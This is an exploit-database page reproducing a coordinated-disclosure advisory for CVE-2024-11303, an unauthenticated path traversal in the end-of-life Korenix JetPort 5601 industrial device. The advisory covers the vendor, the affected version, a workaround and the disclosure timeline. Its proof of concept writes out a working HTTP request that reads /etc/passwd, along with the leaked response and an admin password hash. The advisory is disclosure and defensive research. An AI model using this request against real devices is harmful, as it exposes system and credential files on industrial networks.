0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Korenix JetPort 5601 1.2 Path Traversal Vulnerability
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
------------------------------------------------------------------------------- title| Path Traversal product| Korenix JetPort 5601 vulnerable version| 1.2 fixed version| - CVE number| CVE-2024-11303 impact| High homepage| https://www.korenix.com/ found| 2024-05-24 by| P. Oberndorfer, B. Tösch, M. Narbeshuber-Spletzer, | C. Hierzer, M. Pammer | These vulnerabilities were discovery during research at | St.Pölten UAS, supported and coordinated by CyberDanube. | | https://fhstp.ac.at | https://cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market- oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines [...]. Our products are mainly applied in SMART industries: Surveillance, Machine-to- Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. [...]" Source: https://www.korenix.com/en/about/index.aspx?kind=3 Vulnerable versions ------------------------------------------------------------------------------- Korenix JetPort 5601v3 / v1.2 Vulnerability overview ------------------------------------------------------------------------------- 1) Path Traversal (CVE-2024-11303) A path traversal attack for unauthenticated users is possible. This allows getting access to the operating system of the device and access information like configuration files and connections to other hosts or potentially other sensitive information. Proof of Concept ------------------------------------------------------------------------------- 1) Path Traversal (CVE-2024-11303) By sending the following request to the following endpoint, a path traversal vulnerability can be triggered: ------------------------------------------------------------------------------- GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: 10.69.10.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Te: trailers Connection: keep-alive ------------------------------------------------------------------------------- Note, that this is only possible when an interceptor proxy or a command line tool is used. A web browser would encode the characters and the path traversal would not work. The response to the latter request is shown below: ------------------------------------------------------------------------------- HTTP/1.1 200 OK Server: thttpd/2.19-MX Jun 2 2022 Content-type: text/plain; charset=iso-8859-1 [...] Accept-Ranges: bytes Connection: Keep-Alive Content-length: 86 root::0:0:root:/root:/bin/false admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true ------------------------------------------------------------------------------- The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- None. Device is End-of-Life. Workaround ------------------------------------------------------------------------------- Limit the access to the device and place it within a segmented network. Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Korenix customers to upgrade to another device. Contact Timeline ------------------------------------------------------------------------------- 2024-09-23: Contacting Beijer Electronics Group via cs@beijerelectronics.com. 2024-09-24: Vendor stated, that the device is end-of-life. Contact will ask the engineering team if there are any changes. 2024-10-15: Vendor stated, that the advisory can be published. No further updates are planned for this device. 2024-11-18: Coordinated disclosure of advisory. Web: https://www.fhstp.ac.at/ Twitter: https://x.com/fh_stpoelten Mail: mis@fhstp.ac.at EOF T. Weber / @2024 # 0day.today [2024-12-23] #